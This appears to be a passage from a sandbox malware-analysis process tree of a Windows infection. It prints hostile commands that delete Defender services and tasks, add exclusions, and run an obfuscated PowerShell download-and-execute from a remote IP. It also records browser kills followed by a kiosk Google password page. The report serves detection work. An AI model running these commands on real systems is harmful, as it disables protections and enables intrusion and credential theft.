        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:4508
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:6056
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:4640
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1600
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:3104
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:4728
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:2920
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:3280
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:3612
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5128
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:4556
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:5812
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:1144
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5796
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:5884
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:1500
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4544
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:4592
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:1380
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5476
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:1516
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3984
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:4552
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:2628
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:6108
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:2096
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:5272
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5704
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:2132
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:4724
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:4900
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:1808
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:2800
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:5076
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:5844
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:5368
      - C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408400101\NHq7LaU.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2996
      - C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408410101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2676
      - C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408420101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2060
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4852
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:5132
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5164
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:4672
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        
        PID:2144
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2012
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6084
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5124
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1908
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2896
      - C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408430101\p3hx1_003.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: MapViewOfSection
        
        PID:3888
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:3504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3312
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:5520
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\{6f4cff76-e338-443d-b597-8a3389ff1483}\d9f1658.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{6f4cff76-e338-443d-b597-8a3389ff1483}\d9f1658.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:10744
        
        C:\Users\Admin\AppData\Local\Temp\{bbf5b5ab-91c0-4940-989c-77de43f0a32c}\8c6895b6.exe
        
        C:/Users/Admin/AppData/Local/Temp/{bbf5b5ab-91c0-4940-989c-77de43f0a32c}/\8c6895b6.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        
        PID:6076
      - C:\Users\Admin\AppData\Local\Temp\10408450101\XOPPRUc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408450101\XOPPRUc.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2464
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2104
      - C:\Users\Admin\AppData\Local\Temp\10408470101\h8NlU62.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408470101\h8NlU62.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2012
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6216
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6244
      - C:\Users\Admin\AppData\Local\Temp\10408480101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408480101\TbV75ZR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:7240
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:7280
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        
        PID:7308
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7308 -s 488
        8⤵
        Program crash
        
        PID:7520
      - C:\Users\Admin\AppData\Local\Temp\10408490101\PQPYAYJJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408490101\PQPYAYJJ.exe"
        6⤵
        Executes dropped EXE
        
        PID:7904
      - C:\Users\Admin\AppData\Local\Temp\10408500101\3537b60da7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408500101\3537b60da7.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:4620
      - C:\Users\Admin\AppData\Local\Temp\10408510101\97d82266f8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408510101\97d82266f8.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:3872
      - C:\Users\Admin\AppData\Local\Temp\10408520101\HAe88WC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408520101\HAe88WC.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:9868
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:9920
      - C:\Users\Admin\AppData\Local\Temp\10408610101\abf41d0bfc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408610101\abf41d0bfc.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:10368
      - C:\Users\Admin\AppData\Local\Temp\10408620101\5ac5fd8d48.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408620101\5ac5fd8d48.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408620101\5ac5fd8d48.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:10420
      - C:\Users\Admin\AppData\Local\Temp\10408630101\994f177e74.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408630101\994f177e74.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:7848
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408630101\994f177e74.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6972
      - C:\Users\Admin\AppData\Local\Temp\10408640101\2eff251326.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408640101\2eff251326.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:4312
      - C:\Users\Admin\AppData\Local\Temp\10408650101\52bd0b62e0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408650101\52bd0b62e0.exe"
        6⤵
        
        PID:7584
      - C:\Users\Admin\AppData\Local\Temp\10408660101\a856c388a0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408660101\a856c388a0.exe"
        6⤵
        
        PID:9132
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:9632
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:9876
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:9928
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:10220
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        Kills process with taskkill
        
        PID:10292
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:5736
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        
        PID:10560
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {24c802f3-22a6-48d0-bd7b-54eaebb5e893} -parentPid 10560 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10560" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:11144
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2504 -prefsLen 27135 -prefMapHandle 2508 -prefMapSize 270279 -ipcHandle 2516 -initialChannelId {fc6d1e68-d96f-4156-8c84-99d6891a22db} -parentPid 10560 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10560" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:5556
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3828 -prefsLen 25213 -prefMapHandle 3832 -prefMapSize 270279 -jsInitHandle 3836 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3844 -initialChannelId {a4f561eb-baa0-40f2-be2f-168aa7405758} -parentPid 10560 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10560" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        
        PID:5388
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4040 -prefsLen 27325 -prefMapHandle 4044 -prefMapSize 270279 -ipcHandle 4052 -initialChannelId {2ab56b2e-849a-47b3-b158-dc129343ba94} -parentPid 10560 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10560" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:7712
      - C:\Users\Admin\AppData\Local\Temp\10408670101\47f2edac40.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408670101\47f2edac40.exe"
        6⤵
        
        PID:11540

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3668

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6112
- C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe
  "C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1520
- - C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
    C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:5896
  - - C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
      C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
      4⤵
      Loads dropped DLL
      PID:4288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:6512
- C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe
  "C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2988
- - C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
    C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:3004
  - - C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
      C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Loads dropped DLL
      PID:5104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:9256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5440 -ip 5440
1⤵
PID:6380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6192 -ip 6192
1⤵
PID:6440

C:\ProgramData\Algoworks\Updater.exe
C:\ProgramData\Algoworks\Updater.exe /u
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:6616
- C:\Windows\TEMP\dat2A6.tmp\dat2A7.exe
  C:\Windows\TEMP\dat2A6.tmp\dat2A7.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:8472
- - C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe
    "C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    PID:5844
  - - C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
      C:\Windows\system32\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      PID:8988
    - - C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
        
        C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies data under HKEY_USERS
        
        PID:10600
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))
        6⤵
        Blocklisted process makes network request
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Modifies data under HKEY_USERS
        
        PID:7340
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:9248
- C:\Windows\TEMP\dat483C.tmp\dat483D.exe
  C:\Windows\TEMP\dat483C.tmp\dat483D.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:11084
- - C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe
    "C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID:12020
  - - C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe
      C:\Windows\system32\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:7772
    - - C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe
        
        C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:8704
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7328

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7308 -ip 7308
1⤵
PID:7448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{dfb8b117-fb07-4986-bffb-ada7d4c25ae9}\43f0fe7e-357e-4ced-8842-da8140514f2d.cmd"
1⤵
PID:6164
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12048
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11904
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11812
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11756
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11644
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11596
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11464
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
